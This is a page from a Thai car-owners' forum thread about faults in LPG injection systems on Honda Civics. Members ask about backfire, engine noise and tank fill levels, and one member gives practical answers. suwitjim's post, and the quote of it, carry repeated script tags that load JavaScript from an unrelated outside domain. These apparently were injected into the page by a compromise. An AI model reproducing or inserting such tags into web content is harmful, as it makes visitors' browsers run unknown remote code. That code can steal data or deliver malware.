ตอบ
suwitjim

ชื่อเล่น: วิทย์

เข้าร่วม: 16 ตุลา 2010
ตอบ: 1959

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 893
ให้คำขอบคุณ: 1488

ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 20 มกรา 2011 16:09 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
น้ำมันไม่เป็นครับ ...
Blackfire = ยิงออกท่อไอเสียใช่หรือป่าวครับ (ไม่รู้จิง ๆ ครับพี่)

อาการทั้งหมดมีดังนี้ครับ ...

1.ดังปุ้ง ๆ ยิงออกท่อไอเสีย เวลาที่ถอนคันเร่งแต่ไม่เป็นทุกครั้งที่ถอนคันเร่งนะครับ บ้างครั้งเท่านั้น
2.ใส่เกียร์ว่างเร่งเครื่องแล้วสั่นนิด ๆ เหมือนอาการสดุดครับ
3.พอกดคันเร่งเกือบหมดเครื่องเร่งเหมือนจะออกแรงแต่ก็สดุดวูบลงมาเลยแล้วรอบก็ขึ้นใหม่ ถึงออกได้

ขอโทษจิง ๆ ครับไม่รู้จิง ๆ ครับ

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
URC

ชื่อเล่น: เบียร์

เข้าร่วม: 16 มกรา 2011
ตอบ: 28

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 1

พฤหัส, 20 มกรา 2011 17:47 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
suwitjim พิมพ์ว่า:
น้ำมันไม่เป็นครับ ...
Blackfire = ยิงออกท่อไอเสียใช่หรือป่าวครับ (ไม่รู้จิง ๆ ครับพี่)

อาการทั้งหมดมีดังนี้ครับ ...

1.ดังปุ้ง ๆ ยิงออกท่อไอเสีย เวลาที่ถอนคันเร่งแต่ไม่เป็นทุกครั้งที่ถอนคันเร่งนะครับ บ้างครั้งเท่านั้น
2.ใส่เกียร์ว่างเร่งเครื่องแล้วสั่นนิด ๆ เหมือนอาการสดุดครับ
3.พอกดคันเร่งเกือบหมดเครื่องเร่งเหมือนจะออกแรงแต่ก็สดุดวูบลงมาเลยแล้วรอบก็ขึ้นใหม่ ถึงออกได้

ขอโทษจิง ๆ ครับไม่รู้จิง ๆ ครับ

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">

555+ ผมก็แซวเล่นอ่ะครับ ถ้าบอกว่าน้ำมันไม่เป็น อย่างนั้นจบครับ

ที่แจ้งมาก่อนหน้านี้ไม่ใช่นะครับลืมไปก่อน เดี๋ยวจะสับสน
เพราะใช้น้ำมันแล้วไม่เป็นเลย

ปัญหาต้องเป็นที่ระบบแก๊สแน่นอนครับ อาการนี้ต้อง
ตรวจสอบกรองแก๊สว่าตันไหม มีแก๊สรั่วไหม ถ้าไม่ตันไม่รั่ว
ปรับแรงดันแก๊สขึ้นอีกหน่อยเอาสัก 1.2 บาร์
แล้วจูนแก๊สใหม่ทั้งหมด

อันนี้คือกรณีที่ติดตั้งทุกอย่างถูกต้องนะครับ
ถ้าติดตั้งไม่ถูกก็ต้องแก้ให้ถูกครับ

ส่วนมากที่ละเลยกันคือท่อหัวฉีดแก๊สไม่เท่ากัน
วางหัวฉีดแก๊สหงายท้อง หรือนอน หรือ
เจาะรู้หัวฉีดเล็กไปครับ ลองดูครับ
ได้รับคำขอบคุณจาก: benzd  suwitjim 
pop_2008

เข้าร่วม: 17 มกรา 2010
ตอบ: 600

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 582
ให้คำขอบคุณ: 445

ปี: 2003
ศุกร์, 21 มกรา 2011 09:33 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
รบกวนถามอีกนิดหนึ่ง แบบว่าเพิ่งสังเกตุเรื่องเสียงเครืองหลังจากติดแก็สหัวฉีด
คือได้ยินเสียงแต็กๆๆๆตรงบริเวณที่เจอะไอดีอ่ะ เป็นทั้งตอนใช้แก็สและน้ำมัน
โทรถามช่างเค้าบอกปกติ ผมล่ะงงจริงๆ เครืองเจวางแก็สดูดมันยังเงียบเลย
Nut_Au_Together

ชื่อเล่น: อู๋

เข้าร่วม: 04 มีนา 2009
ตอบ: 1068

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1244
ให้คำขอบคุณ: 1180

ที่อยู่: พระราม 5 ถนนนครอินทร์-----เจริญกรุง 107-----สุขุมวิท 23
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 21 มกรา 2011 10:15 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
คุณเบียร์รับตั้งวาวล์ไหมครับ ถ้ารับคิดราคาเท่าไรครับ
silverqoo

เข้าร่วม: 08 พฤศจิกา 2009
ตอบ: 323

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 580
ให้คำขอบคุณ: 10
ศุกร์, 21 มกรา 2011 20:12 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
pop_2008 พิมพ์ว่า:
รบกวนถามอีกนิดหนึ่ง แบบว่าเพิ่งสังเกตุเรื่องเสียงเครืองหลังจากติดแก็สหัวฉีด
คือได้ยินเสียงแต็กๆๆๆตรงบริเวณที่เจอะไอดีอ่ะ เป็นทั้งตอนใช้แก็สและน้ำมัน
โทรถามช่างเค้าบอกปกติ ผมล่ะงงจริงๆ เครืองเจวางแก็สดูดมันยังเงียบเลย

ผมเคยได้ยินมาว่าเป็นเสียงของหัวฉีดแก๊สน่ะครับ ยังไงผิดพลาด ต้องขออภัยด้วยครับ
URC

น้องใหม่
น้องใหม่

ศุกร์, 21 มกรา 2011 22:00 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ

silverqoo พิมพ์ว่า:

ผมเคยได้ยินมาว่าเป็นเสียงของหัวฉีดแก๊สน่ะครับ ยังไงผิดพลาด ต้องขออภัยด้วยครับ

ผมก็ว่าน่าจะเป็นเสียงหัวฉีด แต่ทีนี้บอกว่าใช้น้ำมันก็มีเหมือนกัน
อย่างนั้นต้องถามกลับว่าเสียงที่มีนั้นเป็นเสียงเดียวกันหรือคนละเสียง
เพราะเสียงหัวฉีดน้ำมัน กับเสียงหัวฉีดแก๊ส เป็นคนละเสียงกัน

ส่วนระบบดูดไม่มีเสียงหัวฉีดเพราะใช้แก๊สระบบดูด ที่ใช้สำหรับเครื่องคาบูเรเตอร์
ถ้าจะมีเสียงก็เสียงระเบิดเลยตอนที่เกิดระเบิดย้อนกลับในท่อไอดีครับ

Nut_Au_Together พิมพ์ว่า:
คุณเบียร์รับตั้งวาวล์ไหมครับ ถ้ารับคิดราคาเท่าไรครับ

สอบถามราคาทางนี้ไม่ผิดกฎหรือครับ เพราะไม่ใช่หน้าซื้อขาย
ยังไงเดี๋ยว PM ราคาไปให้นะครับ
pop_2008

เข้าร่วม: 17 มกรา 2010
ตอบ: 600

ได้รับคำขอบคุณ: 582
ให้คำขอบคุณ: 445

ปี: 2003
เสาร์, 22 มกรา 2011 06:54 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
URC พิมพ์ว่า:

ผมก็ว่าน่าจะเป็นเสียงหัวฉีด แต่ทีนี้บอกว่าใช้น้ำมันก็มีเหมือนกัน
อย่างนั้นต้องถามกลับว่าเสียงที่มีนั้นเป็นเสียงเดียวกันหรือคนละเสียง
เพราะเสียงหัวฉีดน้ำมัน กับเสียงหัวฉีดแก๊ส เป็นคนละเสียงกัน

ส่วนระบบดูดไม่มีเสียงหัวฉีดเพราะใช้แก๊สระบบดูด ที่ใช้สำหรับเครื่องคาบูเรเตอร์
ถ้าจะมีเสียงก็เสียงระเบิดเลยตอนที่เกิดระเบิดย้อนกลับในท่อไอดีครับ

เป็นเสียงเดียวกันเลยครับ
URC

น้องใหม่
น้องใหม่

อาทิตย์, 23 มกรา 2011 21:59 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
URC พิมพ์ว่า:

เป็นเสียงเดียวกันเลยครับ

วันนี้พอดีมีรถ D17 ลูกค้ามาเช็คระยะ 2 คัน ผมเลยไปฟังมาให้
ผมว่าเสียงที่คุณได้ยิน น่าจะเป็นเสียงของวาล์ว Evap ซึ่งเป็นเสียง
การทำงานตามปกติครับ ไม่ได้มีอะไรผิดปกติครับ

แก้ไขล่าสุดโดย เมื่อ จันทร์, 24 มกรา 2011 10:18, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: pop_2008 
Moo Uan

เข้าร่วม: 07 สิงหา 2009
ตอบ: 1127

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 426
ให้คำขอบคุณ: 126

สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 24 มกรา 2011 02:04 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
รับจูนาะบบหัวฉีดมั้ยครับ ขอราคาด้วยpmด้วยครับ
URC

น้องใหม่
น้องใหม่

จันทร์, 24 มกรา 2011 10:25 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
Moo Uan พิมพ์ว่า:
รับจูนาะบบหัวฉีดมั้ยครับ ขอราคาด้วยpmด้วยครับ

ตอนนี้ร้านไม่ได้รับแก้งานจากที่อื่นแล้วครับ มีปัญหาอย่างไรครับ เผื่อจะแนะนำวิธีการแก้ไขให้ได้
เพราะจากประสบการณ์ที่พบมา กว่า 60% เป็นปัญหาจากการติดตั้ง และ ขีดจำกัดของชุดแก๊สเองครับ
ได้รับคำขอบคุณจาก: pop_2008 
benzd

ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 24 มกรา 2011 13:30 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
แวะเข้ามาให้กำลังใจครับ
jintana

ชื่อเล่น: หนึ่ง

เข้าร่วม: 20 ธันวา 2010
ตอบ: 447

ได้รับคำขอบคุณ: 798
ให้คำขอบคุณ: 1056

ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 24 มกรา 2011 13:40 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
ผมไปติดแก๊สมาประมาน 3 เดือนเป็นถังโดนัท 51 ลิตรเติมแก๊สตอนติดตั้งทีแรกประมาน500กว่าบาทพอแก๊สหมดไปเติมเต็มถัง360-400บาทเต็มถัง (ประมาน40ลิตร)ผมขอถามเลยแล้วกัน -ทำไมเติมได้น้อยจังครับ ใช่ถัง 51ลิตรหรือเปล่าแล้วถัง 51ลิตรควรจะเติมได้กี่ลิตรหรือกี่บาท
URC

น้องใหม่
น้องใหม่

จันทร์, 24 มกรา 2011 14:11 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
jintana พิมพ์ว่า:
ผมไปติดแก๊สมาประมาน 3 เดือนเป็นถังโดนัท 51 ลิตรเติมแก๊สตอนติดตั้งทีแรกประมาน500กว่าบาทพอแก๊สหมดไปเติมเต็มถัง360-400บาทเต็มถัง (ประมาน40ลิตร)ผมขอถามเลยแล้วกัน -ทำไมเติมได้น้อยจังครับ ใช่ถัง 51ลิตรหรือเปล่าแล้วถัง 51ลิตรควรจะเติมได้กี่ลิตรหรือกี่บาท

วาล์วนิรภัยตามมาตรฐาน จะเติมได้ประมาณ 80-85 เปอร์เซ็นต์
ของความจุถัง เพื่อความปลอดภัย หากถัง 51 ลิตร เติมได้ 51 ลิตรเลย
ไม่ปกติแน่นอน มี 3 อย่างที่ต้องสังเกตดูโดยด่วนดังนี้ครับ

-ปั๊มแก๊สที่เติม โกงมิเตอร์แน่ๆ
-หัวเติมแก๊สรั่ว
-วาล์วนิรภัยเสีย หรือ ร้านติดตั้งแก๊สดัดแปลง หรือ ถอดอุปกรณ์นิรภัยออก

ส่วนขนาดถัง ลองอ่านที่เพลทของถังดูครับ มีแจ้งไว้ชัดเจนว่าเป็นถังกี่ลิตรครับ
ได้รับคำขอบคุณจาก: cisco 
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.